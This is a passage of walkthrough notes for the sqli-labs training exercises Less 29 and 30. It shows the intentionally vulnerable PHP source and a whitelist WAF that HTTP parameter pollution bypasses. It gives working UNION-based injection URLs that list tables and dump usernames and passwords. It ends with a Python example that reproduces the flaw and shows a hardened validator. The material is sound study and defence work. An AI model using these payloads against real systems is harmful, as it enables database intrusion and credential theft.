print_r(mysql_error());
}
Solution:
http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,2,3 --+
Others:
http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,version(),database() --+
http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
Less - 30: Protection with WAF
Test:
http://localhost/sqli-lab/Less-30/login.php?id=1&id=6
Note: the row for id 6 is shown.
Source Code:
$qs = $_SERVER['QUERY_STRING'];
$hint=$qs;
$id1=java_implimentation($qs);
$id=$_GET['id'];
whitelist($id1);
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {
echo 'Your Login name:'. $row['username'];
echo 'Your Password:' .$row['password'];
} else{
print_r(mysql_error());
}
//WAF implementation with a whitelist approach: only allows numeric input.
function whitelist($input) {
$match = preg_match("/^\d+$/", $input);
if($match) {
} else {
header('Location: hacked.php');
}
}
// The function below imitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string) {
$q_s = $query_string;
$qs_array= explode("&",$q_s);
foreach($qs_array as $key => $value) {
$val=substr($value,0,2);
if($val=="id") {
$id_value=substr($value,3,30);
return $id_value; // returns the FIRST id-like member; the break below is never reached
break;
}
}
}
Solution:
http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,2,3 --+
Others:
http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,version(),database() --+
http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
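Less 29 and 30 show the classic validate-one-thing, use-another mismatch: the lab's java_implimentation() checks the first id= member of the raw query string, while $_GET['id'] in PHP holds the percent-decoded last value, so id=1&id=6 passes the whitelist with 1 and queries with 6. The Python below is an added example, not the lab's code: it reproduces both views of the same query string, checks the trailing-newline quirk of the lab's /^\d+$/ pattern, and shows the hardened version, which validates exactly the value that will be used and refuses a repeated parameter. Function names and the 9-digit cap are this example's own choices.

```python
import re
from urllib.parse import parse_qs


def waf_view_of_id(query_string: str):
    """Mirror of the lab's java_implimentation(): walk the RAW query string, take the
    first '&'-member whose first two characters are 'id', return its characters 3..32."""
    for member in query_string.split("&"):
        if member[:2] == "id":          # also matches 'identity=...' and similar
            return member[3:33]
    return None


def php_view_of_id(query_string: str):
    """What $_GET['id'] holds in PHP: percent-decoded, and the LAST value wins for a
    repeated key."""
    values = parse_qs(query_string, keep_blank_values=True).get("id")
    return values[-1] if values else None


def lab_whitelist_accepts(value) -> bool:
    # The lab's /^\d+$/ check. In PHP as in Python, $ also matches just before a
    # trailing newline, so "6\n" is accepted as "numeric".
    return value is not None and re.search(r"^\d+$", value) is not None


def hardened_id(query_string: str):
    """Validate the same decoded value the query will use: exactly one id, digits only
    end to end (fullmatch), bounded length. Returns an int, or None to reject."""
    values = parse_qs(query_string, keep_blank_values=True).get("id", [])
    if len(values) != 1:
        return None
    if re.fullmatch(r"[0-9]{1,9}", values[0]) is None:
        return None
    return int(values[0])


if __name__ == "__main__":
    # Constructed query strings in the shape recorded in the notes above.
    for qs in ("id=1&id=6", "id=6%0A", "identity=9&id=6", "id=6"):
        print(repr(qs), "waf sees:", repr(waf_view_of_id(qs)),
              "php uses:", repr(php_view_of_id(qs)),
              "hardened:", hardened_id(qs))
```

The hardened function returns the integer the query should bind rather than a flag, so there is no second code path that could read the parameter differently from the check; whether to reject duplicate keys or take the first is a policy choice, but whichever is chosen must be the same value on both sides.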